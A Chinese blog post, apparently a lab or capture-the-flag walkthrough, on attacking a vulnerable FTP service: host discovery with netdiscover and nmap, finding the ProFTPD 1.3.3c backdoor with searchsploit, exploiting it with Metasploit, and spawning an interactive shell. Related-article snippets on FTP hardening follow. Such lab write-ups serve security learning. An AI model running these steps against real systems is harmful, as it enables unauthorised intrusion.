服务安全FTP服务

最新推荐文章于 2022-03-07 22:27:51 发布
最新推荐文章于 2022-03-07 22:27:51 发布
阅读量286 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42328919/article/details/104501134
版权

FTP协议

FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。
百度百科

环境准备:

1.靶场导入:使用 Oracle VM VirtualBox

在这里插入图片描述
在这里插入图片描述
靶场导入完成,启动靶场,等待攻击。。。

2. 打开kali攻击机 攻击机地址:192.168.31.101

在这里插入图片描述

root@kali:~# ifconfig   //查看攻击机IP地址

在这里插入图片描述

netdiscover -r 192.168.31.1/24 #查看同一网段内的活动主机,找到靶场IP.

在这里插入图片描述

nmap -sV 192.168.31.35#扫描主机服务信息及服务版本

探测到了开放了如下服务:

在这里插入图片描述

nmap -A -v -T4 192.168.31.35 #扫描主机全部信息

在这里插入图片描述

searchsploit ProFTPD 1.3.3c

在这里插入图片描述

cat /usr/share/exploitdb/exploits/linux/remote/15662.txt

文本部分代码
在这里插入图片描述
在这里插入图片描述

msfconsole

在这里插入图片描述

search ProFTPd 1.3.3c

Xhpbl80MjMyODkxOQ==,size_16,color_FFFFFF,t_70)

use exploit/unix/ftp/proftpd_133c_backdoor

在这里插入图片描述
设置参数
在这里插入图片描述
设置成功
在这里插入图片描述

id
python -c "import pty;pty.spawn('/bin/bash')"  #优化shell

在这里插入图片描述

嘿嘿!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FTP服务器如何实现安全
箫箫博客
05-19 6109
 作为Internet上的FTP服务器,系统的安全性是非常重要的,这是建立FTP服务器者所考虑的第一个问题。其安全性主要包括以下几个方面:   一、 未经授权的用户禁止在服务器上进行FTP操作。   二、 FTP用户不能读取未经系统所有者允许的文件或目录。   三、 未经允许,FTP用户不能在服务器上建立文件或目录。   四、 FTP用户不能删除服务器上的文件或目录。    FTP服务器采取了一些
ctf训练 服务安全FTP服务
qq_43799246的博客
12-02 362
ctf训练 服务安全FTP服务 FTP介绍 FTP是File Transfer Protocol(文件传输协议)的英文简称,而文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当,用户经常遇到两个概念:"下载”(Downloac)和上传(Upload)。"下载"文件就是从远程主机考贝文件至自己的计算机上,"上传"文件就是将文件从自己的计
如何实现安全FTP服务
weixin_33859231的博客
06-05 189
作者:孙杭华(盐城师范学院) E-mail:sunhanghua@126.com 如何实现安全FTP服务 FTP是一种文件传输协议。有时我们把他形象地叫做“文件交流集地”。FTP文件服务器的主要用途就是提供文件存储的空间,让用户可以上传或下载所需要的文件。在企业,往往会给客户提供一...
安全ftp配置
简单的世界
04-27 549
anonymous_enable=NO //禁止匿名登录,如果为yes即时禁止匿名登录,服务器也是默认开启匿名登录的。 local_enable=YES 这个设定值必须要为YES 时,在 /etc/passwd 内的账号才能以 实体用户的方式登入我们的vsftpd 主机 write_enable=NO 没有写的权限 local_umask=022 #本地用户创建文件或目录的掩码 dirmessag
QT5.0实现FTP服务
06-22
7. **安全性考虑**:虽然FTP本身并不提供加密,但可以使用FTPS(FTP over TLS/SSL)或SFTP(SSH File Transfer Protocol)来增强安全性。在QT5.0,可以利用QSslSocket来实现FTPS。 8. **多线程处理**:为了处理多...
麒麟V10服务器搭建FTP服务
最新发布
12-14
麒麟V10服务器搭建FTP服务 FTP(File Transfer Protocol)是一种常用的文件传输协议,麒麟V10服务器搭建FTP服务可以帮助用户快速搭建FTP服务器,实现文件的上传、下载和共享。本文将指导用户如何在麒麟V10服务器上...
FTP服务安全FTP服务安全.doc
07-05
FTP服务安全FTP服务安全
Linux系统 改善FTP服务器的安全
09-30
FTP是互联网应用的一个元老级人物了,其方便企业用户文件的共享。但是,安全问题也一直伴随在FTP左右。
linux下FTP服务器项目
04-11
总结,本项目涵盖了Linux下的FTP服务器搭建、配置、用户权限管理以及安全措施,是理解网络文件传输和服务运维的良好实践。通过这个项目,你可以深入学习Linux系统管理、网络协议和安全知识,提升IT运维能力。
最方便、安全、免费Ftp服务器软件
04-28
现在一些ftp服务器软件都不安全,会危及你的服务器,serv-u也加大了打击盗版,我们能使用的ftp服务器软件,要不就是功能不强,要不就是需要购买,现在,远科技推出了免费的一个ftp软件,功能强大,设置超简单,多用户使用,体验良好,尚没发现安全漏洞,是你不二的选择。
ftp安全问题
weixin_34191734的博客
11-21 1912
ftp安全问题 ftp漏洞http://www.4hou.com/technology/3507.html posted on 2018-11-21 14:53 wenlin_gk 阅读(...) 评论(...) 编辑 收藏 var allowComments=...
FTP服务基础及安全配置
7Riven's blog
11-21 1296
21号端口控制链接、20号端口数据连接(模式:主动、被动) FTP服务器端配置 安装vsftpd 静态ip设置如下: 客户端配置 安装ftp IP地址设置 查看与服务器端连通性 vsftpd独立运行 测试 在服务器端开启httpd服务,关闭防火墙 在服务器端创建一个张三用户,密码123456,在客户端登录如下 接下来可以登入客户端的浏览器...
ftp 安全事项
weixin_33836874的博客
10-24 142
为什么80%的码农都做不了架构师?>>> ...
文件服务器和ftp服务安全,FTP服务器如何实现安全性 (上)
weixin_35097945的博客
08-01 417
作为Internet上的FTP服务器,系统的安全性是非常重要的,这是建立FTP服务器者所考虑的第一个问题。其安全性主要包括以下几个方面:一、 未经授权的用户禁止在服务器上进行FTP操作。二、 FTP用户不能读取未经系统所有者允许的文件或目录。三、 未经允许,FTP用户不能在服务器上建立文件或目录。四、 FTP用户不能删除服务器上的文件或目录。FTP服务器采取了一些验明用户身份的办法来解决上述第一个...
FTP安全问题
weixin_43846863的博客
03-29 778
vsftpd(very security) ftp服务存在的安全问题 远程的多线程用户 被用户跳转到了上级非授权的目录(如/root) ftp账号没有去掉执行权限,导致恶意用户在服务器上执行了恶意程序 被Sniffer恶意嗅探密码 使用vsftp构建安全ftp服务器 安装vsftp 创建用户 真实用户: useradd -s /sbin/nologin xiaowang vsftp的用户默认可以使用本地的系统账号,如果ftp的账号信息被窃取,可以远程ssh登录用户造成较大的安全隐患,因此
FTP服务器的安全设置
weixin_34226182的博客
09-16 986
一:FTP服务的简介 FTP协议就是文件传输控制协议。它可以使文件通过网络从一台主机传送到同一网络的另一台主机上,而不受计算机类型和操作系统类型的限制。无论是PC机、服务器、大型机,还是DOS操作系统、Windows操作系统、Linux操作系统,只要双方都支持FTP协议,就可以方便地传送文件。 二:FTP的工作原理 FTP服务的具体工作过程如下。 ① 当FTP客户端发...
FTP协议及其安全问题
茶花语的博客
03-07 6839
FTP 安全问题
[转]如何配置更安全FTP
weixin_34161083的博客
05-21 125
一、FTP主要工作原理 FTP是 基于客户端/服务器方式来提供文件传输服务的。一个FTP服务器进程可同时为多个客户进程提供服务,即用户所在的一方是客户方,客户方翻译用户发出的命 令,向提供FTP服务的文件服务器传送适当的请求。服务器端则一直运行着ftpd守护程序,遵循TCP协议,服务进程ftpd在指定的通信端口监听客户发 来的FTP请求,当ftpd确认该用户为合法时,就...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值